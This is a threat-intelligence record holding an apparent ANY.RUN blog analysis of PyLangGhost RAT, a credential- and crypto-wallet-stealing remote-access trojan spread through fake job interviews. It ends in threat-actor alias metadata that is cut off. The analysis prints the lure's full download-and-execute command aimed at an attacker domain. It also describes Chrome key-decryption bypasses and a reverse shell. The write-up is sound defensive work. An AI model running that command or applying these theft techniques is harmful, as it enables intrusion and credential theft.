{ "id": "f6afb4e2-ee1e-486f-8f38-03bdf8ea036d", "created_at": "2026-04-06T00:18:52.473117Z", "updated_at": "2026-04-10T03:38:19.224084Z", "deleted_at": null, "sha1_hash": "5974cd546fdb0aebbbbebbba06950740007ecc37", "title": "PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology  - ANY.RUN's Cybersecurity Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 122654, "plain_text": "PyLangGhost RAT: Rising Stealer from Lazarus Group Striking\r\nFinance and Technology  - ANY.RUN's Cybersecurity Blog\r\nBy Mauro Eldritch\r\nArchived: 2026-04-05 16:04:33 UTC\r\nEditor’s note: The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence\r\nanalyst. You can find Mauro on X. \r\nNorth Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with\r\na variety of custom malware families. In previous research, we examined strains like InvisibleFerret, Beavertail, and\r\nOtterCookie, often deployed through fake developer job interviews or staged business calls with executives. While\r\nthese have been the usual suspects, a newer Lazarus subgroup, Famous Chollima, has recently introduced a fresh\r\nthreat: PyLangGhost RAT, a Python-based evolution of GoLangGhostRAT. \r\nUnlike common malware that spreads through pirated software or infected USB drives, PyLangGhost RAT is delivered\r\nvia highly targeted social engineering campaigns aimed at the technology, finance, and crypto industries, with\r\ndevelopers and executives as prime victims. In these attacks, adversaries stage fake job interviews and trick their targets\r\ninto believing that their browser is blocking access to the camera or microphone. The “solution” they offer is to run a\r\nscript that supposedly grants permission. In reality, the script hands over full remote access to a North Korean operator. \r\nThis sample was obtained from fellow researcher Heiner García Pérez of BlockOSINT, who encountered it during a\r\nfake job recruitment attempt and documented his findings in an advisory.  \r\nLet’s break it down. \r\nA fake interview process. Source: BlockOSINT\r\nKey Takeaways \r\nAttribution: PyLangGhost RAT is linked to the North Korean Lazarus subgroup Famous Chollima, known for\r\nusing highly targeted and creative intrusion methods. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 1 of 20\n\nDelivery Method: Distributed through “ClickFix” social engineering, where victims are tricked into running\r\nmalicious commands to supposedly fix a fake camera or microphone error during staged job interviews. \r\nCore Components: The malware’s main loader (nvidia.py) relies on multiple modules\r\n(config.py, api.py, command.py, util.py, auto.py) for persistence, C2 communication, command execution, data\r\ncompression, and credential theft. \r\nCredential \u0026 Wallet Theft: Targets browser-stored credentials and cryptocurrency wallet data from extensions\r\nlike MetaMask, BitKeep, Coinbase Wallet, and Phantom, using privilege escalation and Chrome encryption key\r\ndecryption (including bypasses for Chrome v20+). \r\nC2 Communication: Communicates over raw IP addresses with no TLS, using weak RC4/MD5 encryption, but\r\nremains stealthy with very low initial detection rates (0–3 detections on VirusTotal). \r\nDetection \u0026 Analysis: Identified as 100/100 malicious by ANY.RUN, with telltale signs including the\r\ndefault python-requests User-Agent and multiple rapid requests to C2 infrastructure. \r\nCode Origin: Appears to be a full Python reimplementation of GoLangGhost RAT, likely aided by AI, as\r\nindicated by Go-like logic patterns, unusual code structure, and large commented-out sections. \r\nThe Fake Job Offer Trap \r\nIn the past, DPRK operators have resorted to creative methods to distribute malware, from staging fake job interviews\r\nand sharing bogus coding challenges (some laced with malware, others seemingly clean but invoking malicious\r\ndependencies at runtime), to posing as VCs in business calls, pretending not to hear the victim, and prompting them to\r\ndownload a fake Zoom fix or update. \r\nThis case is a bit different. It falls into a newer category of attacks called “ClickFix” — scenarios where the attacker, or\r\none of their websites, presents the victim with fake CAPTCHAs or error messages that prevent them from completing\r\nan interview or coding challenge. The proposed fix is deceptively simple: copy a command shown on the website and\r\npaste it into a terminal or the Windows Run window (Win + R) to “solve the issue.” By doing so, users end up\r\nexecuting malicious scripts with their own privileges, or even worse, as Administrator, essentially handing control of\r\nthe system to a Chollima operator. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 2 of 20\n\nA fake “Race Condition” Error, prompting the user to run a command. Source: BlockOSINT\r\nIn this case, the researcher received a fake job offer to work at the Aave DeFi Protocol. After a brief screening with a\r\nfew generic questions, he was redirected to a page that began flooding him with notifications about an error\r\ndubbed “Race Condition in Windows Camera Discovery Cache.” \r\nLuckily, the website offered a quick fix for this “problem”: just run a small code snippet in the terminal. \r\nBut what does this code actually do? Let’s find out. \r\nChollimas \u0026 Pythons \r\nLet’s analyze the command: \r\ncurl -k -o “%TEMP%\\nvidiaRelease.zip” https://360scanner.store/cam-v-b74si.fix \u0026\u0026 powershell -Command\r\n“Expand-Archive -Force -Path ‘%TEMP%\\nvidiaRelease.zip’ \r\n-DestinationPath ‘%TEMP%\\nvidiaRelease'” \u0026\u0026 wscript “%TEMP% \r\n\\nvidiaRelease\\update.vbs” \r\nThis line: \r\nDownloads a ZIP file from 360scanner[.]store using curl. \r\nExtracts it to the %TEMP%\\nvidiaRelease directory using PowerShell’s Expand- Archive. \r\nExecutes a VBScript named update.vbs via wscript. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 3 of 20\n\nupdate.vbs contents\r\nNow let’s look at what this script actually does:\r\nInside update.vbs \r\nIt silently decompresses Lib.zip to the same directory, using tar, and waits for the extraction to finish, hiding any\r\nwindows during the process. \r\nThen, it runs csshost.exe nvidia.py. The filename csshost.exe is mildly obfuscated by being split in two parts (“css” \u0026\r\n“host.exe”) before execution. \r\nDisguised Python Environment \r\nBut what is csshost.exe? \r\nIt’s actually a renamed python.exe binary. Nothing more. No packing, no exotic tricks; just Python, rebranded. \r\nThe Lib.zip file is a clean Python environment bundled with standard libraries, containing nothing malicious or\r\nunusual. \r\nLib.zip contents, clean\r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 4 of 20\n\nA Decoy and Its Real Payload \r\nFunny enough, if you try to download the same file manually with a different User- Agent, the server returns a\r\nlegitimate driver instead — a clever decoy tactic. \r\nOn the other hand, nvidia.py imports three additional components: api.py, config.py, and command.py. The last one, in\r\nturn, also uses util.py and auto.py.  \r\nCore Modules and Their Roles \r\nLet’s break down the 3 modules, starting with config.py. \r\nThis file defines a set of constants used throughout the malware lifecycle, including message types, command codes,\r\nand operational parameters. \r\nHere’s a quick reference of the command dictionary defined in config.py: \r\nCode Function\r\nqwer  Get system information \r\nasdf  Upload a file \r\nzxcv  Download a file \r\nvbcx  Open a terminal session \r\nqalp  Detach terminal (background) \r\nghd  Wait \r\n89io  Gather Chrome extension data \r\ngi%#  Exfiltrate Chrome cookie store \r\nkyci  Exfiltrate Chrome keychain \r\ndghh  Exit the implant \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 5 of 20\n\nCommand dictionary on config.py\r\nImmediately after that, a C2 server based in the United Kingdom is declared (some sources indicate “Private Client –\r\nIran”), along with a registry key used for persistence, and a list of Chrome extensions targeted for exfiltration, including\r\nMetaMask, BitKeep, Coinbase Wallet, and Phantom. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 6 of 20\n\nExtensions list, C2 server and persistence key\r\nComing up next, api.py manages communication with the C2 server we just saw on config.py. There are three main\r\nfunctions: \r\n1. Packet0623make, which resorts to RC4 cipher to encrypt data in transmission, builds a packet and computes a\r\nchecksum. RC4 is obsolete and weak but simple, which may explain why that choice. \r\n2. Packet0623decode, which validates the checksum and decrypts the packet. \r\n3. Htxp0623Exchange, which simply posts the packet to the server without TLS encryption, thus making the RC4\r\nand MD5 cocktail an even weaker choice. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 7 of 20\n\nPackage building using RC4\r\nNow command.py acts as a dispatcher, interpreting both malware logic and C2 communications, and executing\r\ninstructions accordingly. It also handles status messages defined in the config.py module we examined earlier. \r\nThe key functions are: \r\nFunction  Description \r\nProcessInfo \r\nCollects the current user, hostname, OS, architecture, and the malware (daemon)\r\nversion.  \r\nProcessUpload  Allows the attacker to upload compressed files to the victim’s machine. \r\nProcessDownload \r\nStages files or folders for exfiltration. If the target is a folder, it gets compressed\r\nbefore transmission. \r\nProcessTerminal \r\nOpens a reverse shell or executes arbitrary commands, depending on the mode\r\nselected. \r\nmakeMsg0623 /\r\ndecodeMsg0623 \r\nSerialize and deserialize base64-encoded messages exchanged between implant\r\nand C2. \r\nProcessAuto:  Triggers automation routines from the auto.py module \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 8 of 20\n\nFunction to open a reverse shell or run arbitrary commands\r\nYou probably remember that command.py imports two other custom modules: util.py and auto.py. Let’s review them\r\nas well. \r\nModule util.py implements three functions: \r\nFunction  Description \r\ncom0715press  Compresses files in-memory as .tar.gz  \r\ndecom0715press  Extracts .tar.gz files from memory to disk \r\nvalid0715relPath  Validates routes to prevent path transversal \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 9 of 20\n\nAuxiliary functions from util.py\r\nFinally, the last and most critical module: auto.py. \r\nThis module implements two key functions: \r\nAutoGatherMode: Collects configuration data from cryptocurrency browser extensions such as MetaMask,\r\nBitKeep, Coinbase Wallet, and Phantom. \r\nAutoCookieMode: Extracts login artifacts, including credentials and cookies, from Google Chrome. \r\nThe autoGatherMode function searches for the user’s Google Chrome profile directory\r\n(AppData\\Local\\Google\\Chrome\\User Data), starting with the Default profile and then enumerating others. It\r\ncompresses the configuration directories of the targeted extensions into a single archive named gather.tar.gz and\r\nexfiltrates it for manual analysis, with the goal of enabling account takeover or compromising cryptocurrency wallets. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 10 of 20\n\nExfiltrating Google Chrome Profiles in a compressed file\r\nWith the rise of information-stealing malware, browser vendors have introduced various countermeasures to protect\r\nsensitive data such as password managers, cookies, and encrypted storage vaults. Chrome is no exception. To bypass\r\nthese protections, the malware includes functions designed to check whether the user has administrative privileges and\r\nto retrieve Chrome’s encryption key through different methods, depending on the browser version, as the protection\r\nmechanisms vary. \r\nThe autoCookieMode function, on the other hand, starts by checking if the user has administrative privileges. If not, it\r\nrelaunches itself using runas, triggering a UAC (User Access Control) prompt. The prompt is intentionally deceptive, it\r\nsimply displays “python.exe” as the requesting binary, providing no additional context or visual indicators. This subtle\r\nform of social engineering increases the likelihood of the user granting permission. \r\nIf the prompt is accepted, the malware gains elevated privileges, which are necessary to interact with privileged APIs\r\nsuch as the Data Protection API (DPAPI) used to retrieve Chrome’s encryption keys. If the user declines, the malware\r\ncontinues execution with the current user’s privileges. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 11 of 20\n\nMalicious UAC prompt\r\nIt then creates a file named chrome_logins_dump.txt to store the extracted credentials. To do so, it accesses Chrome’s\r\nLocal State file, which contains either an encrypted_key (in v10) or an app_bound_encrypted_key (in v20+). These\r\nkeys are not stored in plaintext but encoded in Base64 and encrypted using Windows DPAPI. While they are accessible\r\nto the current user, they require decryption before use. \r\nGoogle Chrome Keys Harvesting\r\nIn Chrome v10, the encryption key is protected solely by the user’s DPAPI context and can be decrypted directly. In\r\nChrome v20 and later, the key is app-bound and encrypted twice — first with the machine’s DPAPI context, and then\r\nagain with the user’s. To bypass this layered protection, the malware impersonates the lsass.exe process to temporarily\r\ngain SYSTEM privileges. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 12 of 20\n\nImpersonating lsass.exe\r\nIt then applies both layers of decryption, yielding a key blob which, once parsed, reveals the AES master key used to\r\ndecrypt Chrome’s stored credentials. \r\nOnce the key is obtained by either method, the malware connects to the Login Data SQLite database and extracts all\r\nstored credentials, applying the corresponding decryption logic for v10 or v20 entries depending on the case. \r\nCredentials dumped by the process\r\nAt this point, it’s game over for the victim. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 13 of 20\n\nWith the module functionality now understood, the next step is to examine the malware’s core component: nvidia.py.\r\nBefore diving in, here’s a summary of the auxiliary functions contained in this module. \r\ncheck_adminRole: Checks if the current process has administrative privileges using IsUserAnAdmin(). \r\nGetSecretKey: Extracts and decrypts the AES key used by Chrome (v10) from the Local State file using DPAPI. \r\nDecryPayload: Decrypts a payload using a given cipher. \r\nGenCipher: Constructs an AES-GCM cipher object using a given key and IV. \r\nDecryPwd: Decrypts v10-style Chrome passwords using AES-GCM and the secret key obtained via DPAPI. \r\nimpersonate_lsass: Context manager that impersonates the lsass.exe process to gain SYSTEM privileges. \r\nparse_key_blob: Parses Chrome’s v20 encrypted key blob structure to extract the IV, ciphertext, tag, and (if\r\npresent) encrypted AES key. \r\ndecrypt_with_cng: Decrypts data using the Windows CNG API and a hardcoded key name (“Google\r\nChromekey1”). \r\nbyte_xor: Performs XOR between two byte arrays (used to unmask AES key in v20 key blobs). \r\nderive_v20_master_key: Decrypts and derives the AES master key from parsed v20 Chrome blobs, supporting\r\nmultiple encryption flags (AES, ChaCha20, masked AES). \r\nFrom Recon to Full Control \r\nNow, to the core component: nvidia.py. \r\nThis module begins by registering a registry key to establish persistence, assigning a unique identifier (UUID) to the\r\nhost, and creating a pseudo–mutex-like mechanism via a .store file to prevent multiple instances from running\r\nsimultaneously. It then enters a loop, continuously listening for new instructions from the C2 server. Additionally, it\r\nsupports standalone execution with specific command-line arguments, enabling it to immediately perform actions such\r\nas stealing cookies or login data. \r\nAnalysis in ANY.RUN shows that all communication with the C2 servers is carried out over raw IP addresses, with no\r\ndomain names used. While the traffic is not encrypted with TLS, it is at least obfuscated using RC4; a weak method, but\r\nstill an added layer of concealment. \r\nView real case inside ANY.RUN sandbox \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 14 of 20\n\nTraffic to the C2 Server\r\nThe sandbox quickly flags the traffic as suspicious. Because the malware uses the default python-requests User-Agent\r\nand sends multiple rapid requests, this pattern becomes a reliable detection indicator. \r\nTraffic is automatically marked as suspicious\r\nAnother key observation: most of the malware artifacts used in this campaign register only 0 to 3 detections on\r\nVirusTotal, making them particularly stealthy. Fortunately, ANY.RUN immediately identifies these samples as 100/100\r\nmalicious, starting with the initial update.vbs loader. \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 15 of 20\n\nupdate.vbs loader marked as malicious\r\nOther components, including nvidia.py, the main launcher, are also flagged instantly with a 100/100 score, providing\r\nearly warning against this evolving threat. \r\nnvidia.py loader marked as malicious\r\nNew malware, you say? Let’s take a closer look. \r\nGophers, Ghosts \u0026 AI \r\nA variant of this sample was recently observed by other security laboratories, which noted strong similarities\r\nto GoLangGhost RAT. In fact, this appears to be a full reimplementation of that RAT in Python, but with a notable\r\ntwist. \r\nAnalysis revealed numerous linguistic patterns and unusual coding constructions, including dead code, large\r\ncommented-out sections, and Go-style logic structures, suggesting that the port from Go to Python was at least partially\r\nassisted by AI tools. \r\nGhosts, Gophers, Pythons, and AI, all converging in a single malware family.  \r\nLet’s go to the ATT\u0026CK Matrix now, which ANY.RUN does automatically. \r\nPylangGhost RAT ATT\u0026CK Details \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 16 of 20\n\nPylangGhost RAT shares several tactics, techniques, and procedures (TTPs) with its related families,\r\nOtterCookie, InvisibleFerret, and BeaverTail but also introduces some new ones: \r\nT1036  Masquerading  Renames legitimate binaries such as python.exe to csshost.exe. \r\nT1059 \r\nCommand and Scripting\r\nInterpreter \r\nInitiates execution by using wscript.exe to\r\nrun update.vbs and csshost.exe to launch the nvidia.py loader. \r\nT1083 \r\nFiles and Directory\r\nDiscovery \r\nEnumerates user profiles and browser extensions. \r\nT1012  Query Registry  Gains persistence via registry entries created by the update.vbs script. \r\nMITRE ATT\u0026CK Matrix\r\nBusiness Impact of PyLangGhost RAT \r\nPyLangGhost RAT poses a significant risk to organizations in the technology, finance, and cryptocurrency sectors, with\r\npotential consequences including: \r\nFinancial losses: Compromised cryptocurrency wallets and stolen credentials can lead directly to asset theft and\r\nfraudulent transactions. \r\nData breaches: Exfiltration of sensitive corporate data, browser-stored credentials, and internal documents can\r\nexpose intellectual property, customer information, and strategic plans. \r\nOperational disruption: Persistent remote access allows attackers to move laterally, deploy additional\r\npayloads, and disrupt business-critical systems. \r\nReputational damage: Public disclosure of a breach tied to a high-profile state-sponsored group can undermine\r\nclient trust and brand credibility. \r\nRegulatory consequences: Data theft incidents may trigger compliance violations (e.g., GDPR, CCPA,\r\nfinancial regulations) resulting in legal penalties and reporting obligations. \r\nGiven its low detection rate and targeted social engineering approach, PyLangGhost RAT enables attackers to operate\r\ninside a network for extended periods before discovery, increasing both the scope and cost of an incident. \r\nHow to Fight Against PyLangGhost RAT \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 17 of 20\n\nDefending against PyLangGhost RAT requires a combination of proactive detection, security awareness, and layered\r\ndefenses: \r\nUse behavior-based analysis: Solutions like ANY.RUN’s Interactive Sandbox can detect PyLangGhost RAT\r\nin minutes by exposing its execution chain, raw IP C2 connections, and credential theft activity. \r\nValidate unexpected commands: Educate employees to never run commands or scripts provided during job\r\ninterviews or online “technical tests” without verification from security teams. \r\nRestrict administrative privileges: Limit the ability for standard users to run processes with elevated rights,\r\nreducing the malware’s ability to retrieve encrypted browser keys. \r\nMonitor for anomalous network traffic: Look for unusual outbound connections to raw IPs or rapid repeated\r\nHTTP requests from unexpected processes. \r\nHarden browser data security: Apply policies to clear cookies and credentials regularly, disable unneeded\r\nbrowser extensions, and enforce hardware-backed encryption where available. \r\nIncident response readiness: Maintain a process for rapid sandbox testing of suspicious files or scripts to\r\nshorten investigation times and reduce business impact. \r\nSpot Similar Threats Early, Minimizing Business Risk \r\nWhen facing dangerous malware like PyLangGhost RAT, speed of detection is important. Every minute an attacker\r\nremains undetected increases the chances of stolen data, financial loss, and operational disruption. \r\nANY.RUN’s Interactive Sandbox helps organizations identify and analyze threats like PyLangGhost RAT within\r\nminutes, combining real-time execution tracking with behavior-based detection to uncover even low-detection or newly\r\nemerging malware. \r\nRapid incident response: Detect threats early to stop lateral movement, data exfiltration, and further\r\ncompromise. \r\nLower investigation costs: Automated analysis delivers verdicts quickly, reducing the time and resources\r\nneeded for manual investigation. \r\nFaster, smarter decisions: Clear visualized execution flows help security teams assess impact and choose the\r\nright containment measures. \r\nIncreased SOC efficiency: Streamlines detection, analysis, and reporting in one workflow, eliminating\r\nunnecessary manual steps. \r\nProactive threat hunting: Flags stealthy or low-signature artifacts, enabling defenders to identify and block\r\nsimilar threats before they spread. \r\nEarly detection for business means lower risk, reduced costs, and stronger resilience against advanced cyberattacks. \r\nTry ANY.RUN to see how it can strengthen your proactive defense \r\nGathered IOCs \r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 18 of 20\n\nDomain: 360scanner[.]store\r\nIPv4: 13[.]107.246[.]45\r\nIPv4: 151[.]243.101[.]229 \r\nURL: https[:]//360scanner[.]store/cam-v-b74si.fix\r\nURL: http[:]//151[.]243[.]101[.]229[:]8080/ \r\nSHA256 (auto.py.bin) = bb794019f8a63966e4a16063dc785fafe8a5f7c7553bcd3da661c7054c6674c7 \r\nSHA256 (command.py.bin) = c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb \r\nSHA256 (config.py.bin) = c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45 \r\nSHA256 (nvidia.py.bin) = a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940 \r\nSHA256 (util.py.bin) = ef04a839f60911a5df2408aebd6d9af432229d95b4814132ee589f178005c72f \r\nFileName: chrome_logins_dump.txt FileName: gather.tar.gz Mutex:.store \r\nFurther Reading \r\nhttps://otx.alienvault.com/pulse/688186afb933279c4be00337\r\nhttps://app.any.run/tasks/275e3573-0b3e-4e77-afaf-fe99b935c510 \r\nhttps://www.virustotal.com/gui/file/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940/detection \r\nhttps://www.virustotal.com/gui/file/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?\r\nnocache=1\r\nhttps://www.virustotal.com/gui/file/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb/community\r\nMauro\r\nMauro Eldritch\r\nMauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina / Uruguay). He has\r\nspoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and\r\nBiohacking. He currently leads Bitso’s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research.\r\nFollow Mauro on:\r\nX\r\nLinkedIn\r\nGitHub\r\nMauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina / Uruguay). He has\r\nspoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and\r\nBiohacking. He currently leads Bitso’s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research.\r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 19 of 20\n\nFollow Mauro on:\r\nX\r\nLinkedIn\r\nGitHub\r\nSource: https://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nhttps://any.run/cybersecurity-blog/pylangghost-malware-analysis/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://any.run/cybersecurity-blog/pylangghost-malware-analysis/" ], "report_names": [ "pylangghost-malware-analysis" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "7187a642-699d-44b2-9c69-498c80bce81f", "created_at": "2025-08-07T02:03:25.105688Z", "updated_at": "2026-04-10T02:00:03.78394Z", "deleted_at": null, "main_name": "NICKEL TAPESTRY", "aliases": [ "CL-STA-0237 ", "CL-STA-0241 ", "DPRK IT Workers", "Famous Chollima ", "Jasper Sleet Microsoft", "Purpledelta Recorded Future", "Storm-0287 ", "UNC5267 ", "Wagemole " ], "source_name": "Secureworks:NICKEL TAPESTRY", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d05e8567-9517-4bd8-a952-5e8d66f68923", "created_at": "2024-11-13T13:15:31.114471Z", "updated_at": "2026-04-10T02:00:03.761535Z", "deleted_at": null, "main_name": "WageMole", "aliases": [ "Void Dokkaebi", "WaterPlum", "PurpleBravo", "Famous Chollima", "UNC5267", "Wagemole", "Nickel Tapestry", "Storm-1877" ], "source_name": "MISPGALAXY:WageMole", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", 